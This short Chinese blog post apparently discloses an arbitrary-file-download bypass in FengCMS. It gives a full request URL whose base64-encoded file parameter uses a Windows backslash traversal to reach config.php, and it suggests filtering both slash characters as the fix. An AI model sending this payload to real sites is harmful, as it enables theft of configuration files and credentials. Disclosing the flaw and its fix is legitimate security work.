FengCMS任意文件下载绕过第二发(系统特性未考虑

时间: 2020-10-11|tag: 16次围观|0 条评论

你给的测试站点,看源码你是过滤../但是你忘了window支持..\

http://guf521656.h163.92hezu.org/index.php?controller=down&file=L3VwbG9hZC9cLi5cY29uZmlnLnBocA==
 

FengCMS任意文件下载绕过第二发(系统特性未考虑插图

 

FengCMS任意文件下载绕过第二发(系统特性未考虑插图1

 

修复方案:

直接过滤/和\就行了
    上一篇: 用友人力资源管理软件(e-HR)另一处SQL注入漏洞

    下一篇: TurboMail邮件系统任意文件读取漏洞(需管理权限
本博客所有文章如无特别注明均为原创。
复制或转载请以超链接形式注明转自起风了,原文地址《FengCMS任意文件下载绕过第二发(系统特性未考虑
   

还没有人抢沙发呢~